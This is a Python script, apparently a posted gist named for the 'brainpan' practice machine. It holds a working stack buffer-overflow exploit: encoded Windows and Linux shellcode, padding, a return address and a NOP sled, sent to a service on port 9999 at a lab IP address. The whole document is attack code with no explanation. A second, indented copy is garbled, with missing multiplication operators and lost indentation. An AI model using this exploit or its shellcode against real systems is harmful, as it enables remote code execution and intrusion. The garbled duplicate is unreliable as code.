Chiggins/brainpan.py

## brainpan.py
import socket, sys

windows_payload = ("\xd9\xc0\xbf\x0e\x56\x8a\x78\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x4f\x83\xc3\x04\x31\x7b\x15\x03\x7b\x15\xec\xa3\x76\x90\x79"
"\x4b\x87\x61\x19\xc5\x62\x50\x0b\xb1\xe7\xc1\x9b\xb1\xaa\xe9"
"\x50\x97\x5e\x79\x14\x30\x50\xca\x92\x66\x5f\xcb\x13\xa7\x33"
"\x0f\x32\x5b\x4e\x5c\x94\x62\x81\x91\xd5\xa3\xfc\x5a\x87\x7c"
"\x8a\xc9\x37\x08\xce\xd1\x36\xde\x44\x69\x40\x5b\x9a\x1e\xfa"
"\x62\xcb\x8f\x71\x2c\xf3\xa4\xdd\x8d\x02\x68\x3e\xf1\x4d\x05"
"\xf4\x81\x4f\xcf\xc5\x6a\x7e\x2f\x89\x54\x4e\xa2\xd0\x91\x69"
"\x5d\xa7\xe9\x89\xe0\xbf\x29\xf3\x3e\x4a\xac\x53\xb4\xec\x14"
"\x65\x19\x6a\xde\x69\xd6\xf9\xb8\x6d\xe9\x2e\xb3\x8a\x62\xd1"
"\x14\x1b\x30\xf5\xb0\x47\xe2\x94\xe1\x2d\x45\xa9\xf2\x8a\x3a"
"\x0f\x78\x38\x2e\x29\x23\x55\x83\x07\xdc\xa5\x8b\x10\xaf\x97"
"\x14\x8a\x27\x94\xdd\x14\xbf\xdb\xf7\xe0\x2f\x22\xf8\x10\x79"
"\xe1\xac\x40\x11\xc0\xcc\x0b\xe1\xed\x18\x9b\xb1\x41\xf3\x5b"
"\x62\x22\xa3\x33\x68\xad\x9c\x23\x93\x67\xab\x64\x04\x24\xbc"
"\xc2\xd4\x5c\xbf\x12\xc6\xc0\x36\xf4\x82\xe8\x1e\xaf\x3a\x90"
"\x3a\x3b\xda\x5d\x91\xab\x7f\xcf\x7e\x2b\x09\xec\x28\x7c\x5e"
"\xc2\x20\xe8\x72\x7d\x9b\x0e\x8f\x1b\xe4\x8a\x54\xd8\xeb\x13"
"\x18\x64\xc8\x03\xe4\x65\x54\x77\xb8\x33\x02\x21\x7e\xea\xe4"
"\x9b\x28\x41\xaf\x4b\xac\xa9\x70\x0d\xb1\xe7\x06\xf1\x00\x5e"
"\x5f\x0e\xac\x36\x57\x77\xd0\xa6\x98\xa2\x50\xd6\xd2\xee\xf1"
"\x7f\xbb\x7b\x40\xe2\x3c\x56\x87\x1b\xbf\x52\x78\xd8\xdf\x17"
"\x7d\xa4\x67\xc4\x0f\xb5\x0d\xea\xbc\xb6\x07")

linux_payload = ("\xba\x15\x4e\xcd\xb8\xda\xcd\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x12\x31\x50\x12\x03\x50\x12\x83\xd5\x4a\x2f\x4d\xe4\x89\x58"
"\x4d\x55\x6d\xf4\xf8\x5b\xf8\x1b\x4c\x3d\x37\x5b\x3e\x98\x77"
"\x63\x8c\x9a\x31\xe5\xf7\xf2\x6d\x05\xa0\x03\x06\x24\xb0\x12"
"\x8a\xa1\x51\xa4\x54\xe2\xc0\x97\x2b\x01\x6a\xf6\x81\x86\x3e"
"\x90\x36\xa8\xcd\x08\x21\x99\x53\xa1\xdf\x6c\x70\x63\x73\xe6"
"\x96\x33\x78\x35\xd8")

junk = "\x41"*524 + "\xf3\x12\x17\x31" + "\x90"*50 + linux_payload

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect(("172.16.168.128", 9999))
except:
    print "Not gonna connect!"
    sys.exit(0)

s.recv(1024)
s.send(junk)
	import socket, sys

	windows_payload = ("\xd9\xc0\xbf\x0e\x56\x8a\x78\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
	"\x4f\x83\xc3\x04\x31\x7b\x15\x03\x7b\x15\xec\xa3\x76\x90\x79"
	"\x4b\x87\x61\x19\xc5\x62\x50\x0b\xb1\xe7\xc1\x9b\xb1\xaa\xe9"
	"\x50\x97\x5e\x79\x14\x30\x50\xca\x92\x66\x5f\xcb\x13\xa7\x33"
	"\x0f\x32\x5b\x4e\x5c\x94\x62\x81\x91\xd5\xa3\xfc\x5a\x87\x7c"
	"\x8a\xc9\x37\x08\xce\xd1\x36\xde\x44\x69\x40\x5b\x9a\x1e\xfa"
	"\x62\xcb\x8f\x71\x2c\xf3\xa4\xdd\x8d\x02\x68\x3e\xf1\x4d\x05"
	"\xf4\x81\x4f\xcf\xc5\x6a\x7e\x2f\x89\x54\x4e\xa2\xd0\x91\x69"
	"\x5d\xa7\xe9\x89\xe0\xbf\x29\xf3\x3e\x4a\xac\x53\xb4\xec\x14"
	"\x65\x19\x6a\xde\x69\xd6\xf9\xb8\x6d\xe9\x2e\xb3\x8a\x62\xd1"
	"\x14\x1b\x30\xf5\xb0\x47\xe2\x94\xe1\x2d\x45\xa9\xf2\x8a\x3a"
	"\x0f\x78\x38\x2e\x29\x23\x55\x83\x07\xdc\xa5\x8b\x10\xaf\x97"
	"\x14\x8a\x27\x94\xdd\x14\xbf\xdb\xf7\xe0\x2f\x22\xf8\x10\x79"
	"\xe1\xac\x40\x11\xc0\xcc\x0b\xe1\xed\x18\x9b\xb1\x41\xf3\x5b"
	"\x62\x22\xa3\x33\x68\xad\x9c\x23\x93\x67\xab\x64\x04\x24\xbc"
	"\xc2\xd4\x5c\xbf\x12\xc6\xc0\x36\xf4\x82\xe8\x1e\xaf\x3a\x90"
	"\x3a\x3b\xda\x5d\x91\xab\x7f\xcf\x7e\x2b\x09\xec\x28\x7c\x5e"
	"\xc2\x20\xe8\x72\x7d\x9b\x0e\x8f\x1b\xe4\x8a\x54\xd8\xeb\x13"
	"\x18\x64\xc8\x03\xe4\x65\x54\x77\xb8\x33\x02\x21\x7e\xea\xe4"
	"\x9b\x28\x41\xaf\x4b\xac\xa9\x70\x0d\xb1\xe7\x06\xf1\x00\x5e"
	"\x5f\x0e\xac\x36\x57\x77\xd0\xa6\x98\xa2\x50\xd6\xd2\xee\xf1"
	"\x7f\xbb\x7b\x40\xe2\x3c\x56\x87\x1b\xbf\x52\x78\xd8\xdf\x17"
	"\x7d\xa4\x67\xc4\x0f\xb5\x0d\xea\xbc\xb6\x07")

	linux_payload = ("\xba\x15\x4e\xcd\xb8\xda\xcd\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
	"\x12\x31\x50\x12\x03\x50\x12\x83\xd5\x4a\x2f\x4d\xe4\x89\x58"
	"\x4d\x55\x6d\xf4\xf8\x5b\xf8\x1b\x4c\x3d\x37\x5b\x3e\x98\x77"
	"\x63\x8c\x9a\x31\xe5\xf7\xf2\x6d\x05\xa0\x03\x06\x24\xb0\x12"
	"\x8a\xa1\x51\xa4\x54\xe2\xc0\x97\x2b\x01\x6a\xf6\x81\x86\x3e"
	"\x90\x36\xa8\xcd\x08\x21\x99\x53\xa1\xdf\x6c\x70\x63\x73\xe6"
	"\x96\x33\x78\x35\xd8")

	junk = "\x41"524 + "\xf3\x12\x17\x31" + "\x90"50 + linux_payload

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	try:
	s.connect(("172.16.168.128", 9999))
	except:
	print "Not gonna connect!"
	sys.exit(0)

	s.recv(1024)
	s.send(junk)